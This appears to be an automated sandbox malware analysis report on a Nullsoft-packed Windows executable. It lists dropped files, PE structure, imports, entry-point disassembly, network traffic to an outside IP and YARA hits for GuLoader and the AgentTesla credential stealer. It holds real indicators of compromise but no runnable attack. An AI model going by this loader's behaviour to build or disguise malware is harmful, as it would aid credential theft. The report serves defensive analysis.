              Preview:FEE6A8669E78D118DC67A5CFBFFEC42B41EA106FBB6439C877770204CA485EF518706580B268717463D5CB797335A0A4350DCD796FC17224C6434BF095F7CA6B1DB91696C2ADB472E0F9E1E2D5D9262D956F3DB187372096F1F921757D6CF3BF2C192545E4EC2E0119B230B5AE2A35C6F37BA1074F96373F828DDB9E588D13955D1AB94FE615E94016E252B8B38104F562E874B8886AF764B43D98BB66EA7A4F47209579E550F48880977DB1721FBE84477DACD88B7A9715F0DB819F886D56CCEFBB7CF44E40BEFCFF574D5E029E1762B75A84AEB88BC477AD0C2EEA118D4BEE4BCF2EB8DDD0207D78B0EC8551401E1F79E9FB8B2FBE5C4F4026E771F2713CF19CDF0CB33B72276EC057B36A339D1B55FF594867C79F91E160A4306CB89DC803C9D2A891E3B0250832C9561D97669476859BD0FA173F47CCE4052D59DB63C8DA7F75B11332DBC582649E24CAD546663CE0C14FBBE1C832071D322EA51419FF51CF67B56DC3A1EC75B588F2C7B20CAE80771F166C55894E635141CFA69FAE881544C83F0F60B59833A61A433C6F47427621250CE45F35855E28554832210A2F46F0BBC2640B9A2CD045EC3AEF8BDAD8D15D0B80E2F82BA296742D4481221961F2BB57D4461407EAB6FEB6DC9E558BE2DB318A22CDEB0E26889BCA6482843DEB5C73A1C673197F30B4DA15D73000C3C08C5F8CDCD8
              Process:C:\Users\user\Desktop\6culQoI97a.exe
              File Type:SVG Scalable Vector Graphics image
              Category:dropped
              Size (bytes):1626
              Entropy (8bit):5.039495966615547
              Encrypted:false
              SSDEEP:24:t42w+Fdw6OyKbRAecFxVrGMalOY3bYnfS/YH6AAHD1gyKbRAecFxVrGMaFC:fONtAecFmMiScmNtAecFmMmC
              MD5:CCC1083D634E112EBE2FAD8D1809FEB7
              SHA1:AFBBB71D1B029B7FBE45E09C7217945A2668D262
              SHA-256:3D961823A04BAC2FF8748D7624AF7D06B10B3D2566AA93540ADB1FC46F6FA6CF
              SHA-512:3962F71527D2B662D5B9EACA2AF12AE414F01497871F3E818D86A9DF03DC9C08F1A9873265F70745857D65ADA87E623E523BEB80B51CCA99E820C459757B96D2
              Malicious:false
              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="16.006" height="16.013"><path d="M12.98 0a1 1 0 00-.11.01H8v.832A1 1 0 009 2.01h1.586L8 4.596 5.707 2.303a1 1 0 10-1.414 1.414l3 3a1 1 0 001.414 0L12 3.424V5.01a1 1 0 001.158 1H14V1.137a1 1 0 000-.275V.01h-.854A1 1 0 0012.98 0z" style="line-height:normal;font-variant-ligatures:normal;font-variant-position:normal;font-variant-caps:normal;font-variant-numeric:normal;font-variant-alternates:normal;font-feature-settings:normal;text-indent:0;text-align:start;text-decoration-line:none;text-decoration-style:solid;text-decoration-color:#000;text-transform:none;text-orientation:mixed;shape-padding:0;isolation:auto;mix-blend-mode:normal;marker:none" color="#000" font-weight="400" font-family="sans-serif" overflow="visible" fill="#2e3436"/><path class="error" d="M14.242 15.725a.979.979 0 01-1.387 0l-1.04-1.04-1.041-1.04a.979.979 0 010-1.387l.493-.493a6.838 6.838 0 00-6.534 0l.493.493a.979.979 0 010 1.387l-1.04 1.04-1.04 1.04a.979.979 0 01-1.388 0l-1.
              Process:C:\Users\user\Desktop\6culQoI97a.exe
              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):11776
              Entropy (8bit):5.854450882766351
              Encrypted:false
              SSDEEP:192:jPtkiQJr7V9r3HcU17S8g1w5xzWxy6j2V7i77blbTc4I:u7VpNo8gmOyRsVc4
              MD5:34442E1E0C2870341DF55E1B7B3CCCDC
              SHA1:99B2FA21AEAD4B6CCD8FF2F6D3D3453A51D9C70C
              SHA-256:269D232712C86983336BADB40B9E55E80052D8389ED095EBF9214964D43B6BB1
              SHA-512:4A8C57FB12997438B488B862F3FC9DC0F236E07BB47B2BCE6053DCB03AC7AD171842F02AC749F02DDA4719C681D186330524CD2953D33CB50854844E74B33D51
              Malicious:false
              Antivirus:
              • Antivirus: ReversingLabs, Detection: 0%
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......ir*.-.D.-.D.-.D...J.*.D.-.E.>.D.....*.D.y0t.).D.N1n.,.D..3@.,.D.Rich-.D.........PE..L.....`...........!..... ..........!).......0...............................`............@..........................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..c....0.......$..............@..@.data...h....@.......(..............@....reloc..|....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):6.777623756268328
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:6culQoI97a.exe
              File size:334430
              MD5:d9aa122b8c39444799e60eabbab69502
              SHA1:0175baf7a240c2050571a6df273a892e8b192d81
              SHA256:317b5db72d7c43ab63caffa88412395a1b010d24f234eb1b7eeabc92105db143
              SHA512:4ba7e997ffad2ce396faa08d8be8cd6b7073e37828b347fad1ca3f1112d257ecd235c7df9d3d6c78e6b9f96ce878c5fbe2d2a70f7428648f1d2aa14aba7f5d38
              SSDEEP:6144:0x/MQs/IvHdjSzIH1qrb+WECj3wc0ibE0+Ix:wxAIVu8VWb+WEY3LbEt6
              TLSH:7964F1253F64DC27C2A906708EF3D329D6F9D9406E634717BB8177ACBD31780B91A18A
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..L@../O...@...c...@..+F...@..Rich.@..........PE..L......`.................d....9.....%3............@
              Icon Hash:6070dee2bab2c43c
              Entrypoint:0x403325
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x60FC909C [Sat Jul 24 22:13:48 2021 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:ced282d9b261d1462772017fe2f6972b
              Instruction
              sub esp, 00000184h
              push ebx
              push esi
              push edi
              xor ebx, ebx
              push 00008001h
              mov dword ptr [esp+18h], ebx
              mov dword ptr [esp+10h], 0040A198h
              mov dword ptr [esp+20h], ebx
              mov byte ptr [esp+14h], 00000020h
              call dword ptr [004080B8h]
              call dword ptr [004080BCh]
              and eax, BFFFFFFFh
              cmp ax, 00000006h
              mov dword ptr [007A2F6Ch], eax
              je 00007F1928426BF3h
              push ebx
              call 00007F1928429D56h
              cmp eax, ebx
              je 00007F1928426BE9h
              push 00000C00h
              call eax
              mov esi, 004082A0h
              push esi
              call 00007F1928429CD2h
              push esi
              call dword ptr [004080CCh]
              lea esi, dword ptr [esi+eax+01h]
              cmp byte ptr [esi], bl
              jne 00007F1928426BCDh
              push 0000000Bh
              call 00007F1928429D2Ah
              push 00000009h
              call 00007F1928429D23h
              push 00000007h
              mov dword ptr [007A2F64h], eax
              call 00007F1928429D17h
              cmp eax, ebx
              je 00007F1928426BF1h
              push 0000001Eh
              call eax
              test eax, eax
              je 00007F1928426BE9h
              or byte ptr [007A2F6Fh], 00000040h
              push ebp
              call dword ptr [00408038h]
              push ebx
              call dword ptr [00408288h]
              mov dword ptr [007A3038h], eax
              push ebx
              lea eax, dword ptr [esp+38h]
              push 00000160h
              push eax
              push ebx
              push 0079E528h
              call dword ptr [0040816Ch]
              push 0040A188h
              Programming Language:
              • [EXP] VC++ 6.0 SP5 build 8804
              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x3c70000x28868.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x62300x6400False0.6699609375data6.441889952551939IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x80000x12740x1400False0.4337890625data5.061067348371254IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0xa0000x3990780x600unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .ndata0x3a40000x230000x0False0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0x3c70000x288680x28a00False0.5296875data5.194338163153121IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              NameRVASizeTypeLanguageCountry
              RT_BITMAP0x3c73b80x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States
              RT_ICON0x3c77200x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States
              RT_ICON0x3d7f480x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States
              RT_ICON0x3e13f00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States
              RT_ICON0x3e68780x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States
              RT_ICON0x3eaaa00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
              RT_ICON0x3ed0480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
              RT_ICON0x3ee0f00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
              RT_ICON0x3eea780x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
              RT_DIALOG0x3eeee00x144dataEnglishUnited States
              RT_DIALOG0x3ef0280x13cdataEnglishUnited States
              RT_DIALOG0x3ef1680x100dataEnglishUnited States
              RT_DIALOG0x3ef2680x11cdataEnglishUnited States
              RT_DIALOG0x3ef3880xc4dataEnglishUnited States
              RT_DIALOG0x3ef4500x60dataEnglishUnited States
              RT_GROUP_ICON0x3ef4b00x76dataEnglishUnited States
              RT_MANIFEST0x3ef5280x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States
              DLLImport
              ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
              SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
              ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
              USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv
              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States
              TimestampSource PortDest PortSource IPDest IP
              Nov 28, 2022 19:17:55.642931938 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.664489031 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.664750099 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.665221930 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.689093113 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.689237118 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.689269066 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.689399958 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.689481974 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.689491034 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.689673901 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.689831972 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.710146904 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.710237026 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.710330009 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.710347891 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.710536003 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.710566044 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.710622072 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.710679054 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.710736990 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.710743904 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.710745096 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.710819960 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.710875988 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.710905075 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.710954905 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.711077929 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.711078882 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.711078882 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.711244106 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.730001926 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.730169058 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.730307102 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.730503082 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.730556965 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.730690002 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.730750084 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.730757952 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.730832100 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.730886936 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.730938911 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.730969906 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.731014013 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.731070042 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.731143951 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.731143951 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.731143951 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.731308937 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.731524944 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.749439001 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.749536037 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.749670029 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.749779940 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.750530958 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.750623941 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.750693083 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.750700951 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.750775099 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.750829935 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.750869036 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.750869036 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.750917912 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.750972033 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.751025915 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.751038074 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.751085043 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.751257896 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.751257896 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.769414902 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.769510031 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.769594908 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.769753933 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.770581007 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.770675898 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.770745039 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.770770073 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.770836115 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.770891905 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.770940065 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.770940065 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.770978928 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.771038055 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.771094084 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.771106958 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.771280050 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.771281004 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.771450996 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.789984941 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.790081024 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.790366888 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.791635990 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.791731119 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.791790009 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.791840076 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.791876078 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.791887045 CET4981080192.168.11.20195.178.120.24
              Nov 28, 2022 19:17:55.791954994 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.792010069 CET8049810195.178.120.24192.168.11.20
              Nov 28, 2022 19:17:55.792057037 CET4981080192.168.11.20195.178.120.24
              • 195.178.120.24

              Click to jump to process

              Target ID:2
              Start time:19:17:09
              Start date:28/11/2022
              Path:C:\Users\user\Desktop\6culQoI97a.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\6culQoI97a.exe
              Imagebase:0x400000
              File size:334430 bytes
              MD5 hash:D9AA122B8C39444799E60EABBAB69502
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000002.00000002.1204047985.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low

              Target ID:9
              Start time:19:17:34
              Start date:28/11/2022
              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\Desktop\6culQoI97a.exe
              Imagebase:0xbd0000
              File size:108664 bytes
              MD5 hash:914F728C04D3EDDD5FBA59420E74E56B
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:.Net C# or VB.NET
              Yara matches:
              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000000.972511906.0000000000FB0000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
              • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000009.00000002.5806993924.000000001D5E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:high

              Target ID:10
              Start time:19:17:34
              Start date:28/11/2022
              Path:C:\Windows\System32\conhost.exe
              Wow64 process (32bit):false
              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Imagebase:0x7ff71ab60000
              File size:875008 bytes
              MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              No disassembly